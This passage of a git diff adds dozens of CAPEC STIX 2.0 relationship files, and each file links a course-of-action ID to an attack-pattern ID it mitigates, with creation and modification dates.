+ "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--418ae38a-5f47-4d2b-a587-8a3d06f52e18.json b/capec/relationship/relationship--418ae38a-5f47-4d2b-a587-8a3d06f52e18.json new file mode 100644 index 0000000000..1087af49cb --- /dev/null +++ b/capec/relationship/relationship--418ae38a-5f47-4d2b-a587-8a3d06f52e18.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--5953804b-2184-4c89-ab9b-396c4397333e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--418ae38a-5f47-4d2b-a587-8a3d06f52e18", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--92a14d9f-b461-40db-9a7e-00ac104eb828", + "target_ref": "attack-pattern--2e72ce44-c580-471c-a9ac-6e6a600b67b2", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--41e4519b-aa9d-41d6-8893-7929b515667a.json b/capec/relationship/relationship--41e4519b-aa9d-41d6-8893-7929b515667a.json new file mode 100644 index 0000000000..c85ec94f8c --- /dev/null +++ b/capec/relationship/relationship--41e4519b-aa9d-41d6-8893-7929b515667a.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--0feba632-f2e5-4571-8e6f-3c2ac8514f3c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--41e4519b-aa9d-41d6-8893-7929b515667a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8d86079c-91d7-4810-81a1-5de9fa958dbf", + "target_ref": "attack-pattern--fe33600f-e2e6-48c2-8033-e571646d5c66", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--41ee0f19-8e89-40ba-bca9-71f8260e549b.json b/capec/relationship/relationship--41ee0f19-8e89-40ba-bca9-71f8260e549b.json new file mode 100644 index 0000000000..71bc13a3c2 --- /dev/null +++ b/capec/relationship/relationship--41ee0f19-8e89-40ba-bca9-71f8260e549b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ceb5880b-ded5-428a-a25e-0d7e9ee0317e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--41ee0f19-8e89-40ba-bca9-71f8260e549b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a9cece7b-a84a-4af1-8e06-3f188167a17c", + "target_ref": "attack-pattern--ef49301f-4b17-4c00-89f7-f2f06f9af9c1", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--4240910f-d963-4711-8840-ced5c6574b16.json b/capec/relationship/relationship--4240910f-d963-4711-8840-ced5c6574b16.json new file mode 100644 index 0000000000..b2f08d9a85 --- /dev/null +++ b/capec/relationship/relationship--4240910f-d963-4711-8840-ced5c6574b16.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--5dbca790-5616-4d5c-8983-8507ba1db217", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--4240910f-d963-4711-8840-ced5c6574b16", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ec22dfe1-7907-4279-a8ad-5fae3bf783ca", + "target_ref": "attack-pattern--d45dd12b-2a90-40e8-8e17-4e1a5062117c", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--42e9c35f-213d-4a90-8635-972c1e112e22.json b/capec/relationship/relationship--42e9c35f-213d-4a90-8635-972c1e112e22.json new file mode 100644 index 0000000000..9646a9da5c --- /dev/null +++ b/capec/relationship/relationship--42e9c35f-213d-4a90-8635-972c1e112e22.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--cb64faf1-4380-428b-9673-34bd9677d199", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--42e9c35f-213d-4a90-8635-972c1e112e22", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bdadfed6-ab7b-490a-bfe9-fa4f27416e89", + "target_ref": "attack-pattern--f933e0a9-328c-4b49-ad26-c2442a24a3c3", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--42fa5e6c-6844-40d2-95cd-546d532dbe2f.json b/capec/relationship/relationship--42fa5e6c-6844-40d2-95cd-546d532dbe2f.json new file mode 100644 index 0000000000..5ad163c822 --- /dev/null +++ b/capec/relationship/relationship--42fa5e6c-6844-40d2-95cd-546d532dbe2f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--218889d7-cd0e-4605-8061-d90b7911d39d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--42fa5e6c-6844-40d2-95cd-546d532dbe2f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9096203e-c235-4aad-a35e-ee0728293df7", + "target_ref": "attack-pattern--47f60b51-3222-42dd-b08d-ee023ab89afe", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--43620880-b38c-4cf0-8aee-8a522dba7ec0.json b/capec/relationship/relationship--43620880-b38c-4cf0-8aee-8a522dba7ec0.json new file mode 100644 index 0000000000..e9e58c4c1b --- /dev/null +++ b/capec/relationship/relationship--43620880-b38c-4cf0-8aee-8a522dba7ec0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--11d9a520-9511-4ba9-8a03-52f045e347ae", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--43620880-b38c-4cf0-8aee-8a522dba7ec0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-04T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d3a8826a-e076-4be8-b4ef-bdfab8c90e08", + "target_ref": "attack-pattern--67b5679d-1866-4df2-952d-b26985bd3651", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--43ad5189-f992-454a-bb64-130c06a71e46.json b/capec/relationship/relationship--43ad5189-f992-454a-bb64-130c06a71e46.json new file mode 100644 index 0000000000..f3947cccf5 --- /dev/null +++ b/capec/relationship/relationship--43ad5189-f992-454a-bb64-130c06a71e46.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d44b03e9-2efe-4a81-b722-7ae033d0eab8", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--43ad5189-f992-454a-bb64-130c06a71e46", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a039914e-d5b9-46c7-98fa-57d0c714c8e5", + "target_ref": "attack-pattern--f25dc9c0-4a8d-4131-9802-71631d0a08af", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--43c01944-e35a-4933-8afc-2611060ce775.json b/capec/relationship/relationship--43c01944-e35a-4933-8afc-2611060ce775.json new file mode 100644 index 0000000000..6a0b0c5fa5 --- /dev/null +++ b/capec/relationship/relationship--43c01944-e35a-4933-8afc-2611060ce775.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--baaff705-d7b3-4259-98bb-fdf45f5e641a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--43c01944-e35a-4933-8afc-2611060ce775", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--72dd2acb-8073-41ff-96fb-770cfa9e5583", + "target_ref": "attack-pattern--072159ee-a734-4aec-8162-f36adbfb2f71", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--44c86cc6-d5b3-4aba-a9e1-a8996a5711b1.json b/capec/relationship/relationship--44c86cc6-d5b3-4aba-a9e1-a8996a5711b1.json new file mode 100644 index 0000000000..bb43e75179 --- /dev/null +++ b/capec/relationship/relationship--44c86cc6-d5b3-4aba-a9e1-a8996a5711b1.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--420e8379-0374-4b6d-b783-1b5346034c99", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--44c86cc6-d5b3-4aba-a9e1-a8996a5711b1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8882bec0-0998-407d-b36f-b7a596e4e3ac", + "target_ref": "attack-pattern--2372b712-3a94-46d5-86d4-67d489cdbf95", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--4501043c-9ef9-49d7-880c-9b86a6e6b972.json b/capec/relationship/relationship--4501043c-9ef9-49d7-880c-9b86a6e6b972.json new file mode 100644 index 0000000000..32c1db602c --- /dev/null +++ b/capec/relationship/relationship--4501043c-9ef9-49d7-880c-9b86a6e6b972.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--cb44cac2-b366-48d8-ab75-4014d336087a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--4501043c-9ef9-49d7-880c-9b86a6e6b972", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e4adb3b1-70c1-4e55-a3f0-446e8a7e2245", + "target_ref": "attack-pattern--80135864-8689-44e9-8bdb-2c5034a76506", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--45615c94-2b28-49fb-8516-b529a389c8e8.json b/capec/relationship/relationship--45615c94-2b28-49fb-8516-b529a389c8e8.json new file mode 100644 index 0000000000..7113191bba --- /dev/null +++ b/capec/relationship/relationship--45615c94-2b28-49fb-8516-b529a389c8e8.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a68af82f-ff32-41ca-ab6c-81eddbcab25e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--45615c94-2b28-49fb-8516-b529a389c8e8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a7e6b281-8e4e-4a25-9724-167e00f6ffca", + "target_ref": "attack-pattern--9e561f3e-1dc5-4db0-9fea-92bcb3b3f1c9", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--4565c93a-9073-48e1-95b3-7c1d7424096e.json b/capec/relationship/relationship--4565c93a-9073-48e1-95b3-7c1d7424096e.json new file mode 100644 index 0000000000..f1db1eae2b --- /dev/null +++ b/capec/relationship/relationship--4565c93a-9073-48e1-95b3-7c1d7424096e.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--65b3efc2-b1a5-4d17-b1cf-9d1a6f7d4680", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--4565c93a-9073-48e1-95b3-7c1d7424096e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ad51053f-77b9-4c9f-8c23-e40fafcfb8bc", + "target_ref": "attack-pattern--3bc5a3b3-0f5f-490a-b802-6a4cadf049f8", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--456dd93d-dc75-4df9-bdb9-f72d6434d738.json b/capec/relationship/relationship--456dd93d-dc75-4df9-bdb9-f72d6434d738.json new file mode 100644 index 0000000000..7574f3eb20 --- /dev/null +++ b/capec/relationship/relationship--456dd93d-dc75-4df9-bdb9-f72d6434d738.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e322c4aa-6bc6-4b53-b9f0-a94769a89c11", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--456dd93d-dc75-4df9-bdb9-f72d6434d738", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-06T00:00:00.000Z", + "modified": "2017-01-06T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--92a14d9f-b461-40db-9a7e-00ac104eb828", + "target_ref": "attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--458cb85d-355f-4b67-af71-eda3f97098e9.json b/capec/relationship/relationship--458cb85d-355f-4b67-af71-eda3f97098e9.json new file mode 100644 index 0000000000..c789da6da6 --- /dev/null +++ b/capec/relationship/relationship--458cb85d-355f-4b67-af71-eda3f97098e9.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f9c1a530-7c73-4df7-a0d9-bf16cbf6ad15", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--458cb85d-355f-4b67-af71-eda3f97098e9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2019-04-04T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--fa5c5206-e8e1-4eac-8f99-b82d51657e34", + "target_ref": "attack-pattern--d39afdc9-d913-4686-a5f8-e4ab56eec66e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--45e9e777-290f-4487-a2b8-cc734bd576de.json b/capec/relationship/relationship--45e9e777-290f-4487-a2b8-cc734bd576de.json new file mode 100644 index 0000000000..42ac9d7e7a --- /dev/null +++ b/capec/relationship/relationship--45e9e777-290f-4487-a2b8-cc734bd576de.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c0902963-a6f5-4c29-b6c6-481a12fe6338", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--45e9e777-290f-4487-a2b8-cc734bd576de", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3708e269-8e45-425f-bf69-d91b54911e5c", + "target_ref": "attack-pattern--ee3a115d-a03f-47db-b64c-d42b8b5006c2", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--460dbf85-6d21-426d-965f-e46fdf180719.json b/capec/relationship/relationship--460dbf85-6d21-426d-965f-e46fdf180719.json new file mode 100644 index 0000000000..0ff2fb3f30 --- /dev/null +++ b/capec/relationship/relationship--460dbf85-6d21-426d-965f-e46fdf180719.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--657151c0-5c40-4a7a-aaaf-5ea94cd0f693", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--460dbf85-6d21-426d-965f-e46fdf180719", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ebb71328-0223-4062-8a80-43070611f373", + "target_ref": "attack-pattern--a0553da3-9941-4500-b267-cb7e16a5bc63", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--4624b19e-5704-4747-a1ea-1b857692f821.json b/capec/relationship/relationship--4624b19e-5704-4747-a1ea-1b857692f821.json new file mode 100644 index 0000000000..7cce821e44 --- /dev/null +++ b/capec/relationship/relationship--4624b19e-5704-4747-a1ea-1b857692f821.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--2c1682f6-f32c-46e3-b973-ca284c4da226", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--4624b19e-5704-4747-a1ea-1b857692f821", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--39a3cf0d-a301-4aff-b32c-1ed38ed15957", + "target_ref": "attack-pattern--0e6d2797-eedc-4782-8e0c-eb9a682d2b54", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--46a94477-fcd6-438a-acc6-5f613e993979.json b/capec/relationship/relationship--46a94477-fcd6-438a-acc6-5f613e993979.json new file mode 100644 index 0000000000..50c66af118 --- /dev/null +++ b/capec/relationship/relationship--46a94477-fcd6-438a-acc6-5f613e993979.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--701ae07e-872a-4dcd-96bf-0b82b33976f4", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--46a94477-fcd6-438a-acc6-5f613e993979", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a61b1090-6bb5-4c3c-9573-0f3734bd39bb", + "target_ref": "attack-pattern--5869bbce-1e2f-4f18-b5f0-34cc2fcc9b57", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--46cc47c4-f87c-420f-86ad-1c5924903da7.json b/capec/relationship/relationship--46cc47c4-f87c-420f-86ad-1c5924903da7.json new file mode 100644 index 0000000000..0b9bbedf2e --- /dev/null +++ b/capec/relationship/relationship--46cc47c4-f87c-420f-86ad-1c5924903da7.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--9fb8fbf1-2cfe-4dcc-9319-c8bdd50a9256", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--46cc47c4-f87c-420f-86ad-1c5924903da7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--aef776c9-1fbd-49f6-87a3-e52f6db91a2b", + "target_ref": "attack-pattern--ed658e2d-79ca-4953-a56b-3866cce3684a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--46deae11-cdef-4ff0-8112-dd2ef024dfc4.json b/capec/relationship/relationship--46deae11-cdef-4ff0-8112-dd2ef024dfc4.json new file mode 100644 index 0000000000..accdbcd016 --- /dev/null +++ b/capec/relationship/relationship--46deae11-cdef-4ff0-8112-dd2ef024dfc4.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--30806394-dd3a-4584-af66-2b2280cf09a6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--46deae11-cdef-4ff0-8112-dd2ef024dfc4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e88fd775-8949-41b9-a6c5-cdd3b5ac5118", + "target_ref": "attack-pattern--47c67c9b-d65c-4eb8-ac6e-9c0de8c64ba3", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--47087e35-bd4f-46c7-8d01-6312d655f85f.json b/capec/relationship/relationship--47087e35-bd4f-46c7-8d01-6312d655f85f.json new file mode 100644 index 0000000000..3e50493134 --- /dev/null +++ b/capec/relationship/relationship--47087e35-bd4f-46c7-8d01-6312d655f85f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ae137489-1129-436a-abaa-5de891187d4a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--47087e35-bd4f-46c7-8d01-6312d655f85f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ee2910f0-6c14-4cbb-8864-08e53c27a54e", + "target_ref": "attack-pattern--4859301d-e5f0-40d1-b5ed-976929e27e94", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--4784e3b1-b9fe-44f7-8155-d30786b6e010.json b/capec/relationship/relationship--4784e3b1-b9fe-44f7-8155-d30786b6e010.json new file mode 100644 index 0000000000..47094ed418 --- /dev/null +++ b/capec/relationship/relationship--4784e3b1-b9fe-44f7-8155-d30786b6e010.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ac2ea167-2da7-4e3f-bfaa-1bd4451c4f34", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--4784e3b1-b9fe-44f7-8155-d30786b6e010", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d5c9990e-fec4-4e5e-a4bd-07a832e34a43", + "target_ref": "attack-pattern--ce52b42b-d355-43fb-92f9-ce114cd3cfdf", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--47a0f4dd-4da8-4516-a0c4-d529b72720ad.json b/capec/relationship/relationship--47a0f4dd-4da8-4516-a0c4-d529b72720ad.json new file mode 100644 index 0000000000..8b3965a7a8 --- /dev/null +++ b/capec/relationship/relationship--47a0f4dd-4da8-4516-a0c4-d529b72720ad.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--258c0c23-29ac-4457-b8f2-43c7cbab9886", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--47a0f4dd-4da8-4516-a0c4-d529b72720ad", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--442f1611-a705-47fb-b7a4-637fd7773ea1", + "target_ref": "attack-pattern--80135864-8689-44e9-8bdb-2c5034a76506", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--47afd0f6-2880-4127-9e59-1ab92546ffa0.json b/capec/relationship/relationship--47afd0f6-2880-4127-9e59-1ab92546ffa0.json new file mode 100644 index 0000000000..772071a4e8 --- /dev/null +++ b/capec/relationship/relationship--47afd0f6-2880-4127-9e59-1ab92546ffa0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f51ac908-d381-406d-9aba-a8ba91d93e89", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--47afd0f6-2880-4127-9e59-1ab92546ffa0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1742217f-e758-4f36-b907-f5aba0c2abd1", + "target_ref": "attack-pattern--c565b674-66ce-418c-8611-0e2cfb445c42", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--47bc009e-e6bb-486e-9fe7-9024aebe6b46.json b/capec/relationship/relationship--47bc009e-e6bb-486e-9fe7-9024aebe6b46.json new file mode 100644 index 0000000000..c9436297bc --- /dev/null +++ b/capec/relationship/relationship--47bc009e-e6bb-486e-9fe7-9024aebe6b46.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b7fde224-d1bb-478b-94b6-5bd83d4dab98", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--47bc009e-e6bb-486e-9fe7-9024aebe6b46", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f12b8ad6-f41b-4ce6-bc2e-c335d0849b55", + "target_ref": "attack-pattern--d47faea4-b41f-494f-ab97-0e69b3029095", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--47d20968-0f5f-4c61-a962-fc2245126384.json b/capec/relationship/relationship--47d20968-0f5f-4c61-a962-fc2245126384.json new file mode 100644 index 0000000000..8e352af088 --- /dev/null +++ b/capec/relationship/relationship--47d20968-0f5f-4c61-a962-fc2245126384.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4fff3dbe-b217-4254-9256-2256c619a0f0", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--47d20968-0f5f-4c61-a962-fc2245126384", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d6e6bdf1-4cf0-47dd-bc63-891dfd4e3d9e", + "target_ref": "attack-pattern--6627f4c5-d918-40b5-bb4a-8ade04d5e926", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--49367de5-15be-4ddf-b60b-23ae4b9813a9.json b/capec/relationship/relationship--49367de5-15be-4ddf-b60b-23ae4b9813a9.json new file mode 100644 index 0000000000..58517397c0 --- /dev/null +++ b/capec/relationship/relationship--49367de5-15be-4ddf-b60b-23ae4b9813a9.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--cf070e8c-ccae-4c89-97b3-9fc6f5f6c334", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--49367de5-15be-4ddf-b60b-23ae4b9813a9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--43f74fd8-92d6-4daa-8165-b99a12cb6248", + "target_ref": "attack-pattern--642de78e-0ded-49d0-bd92-b8b1f826f645", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git 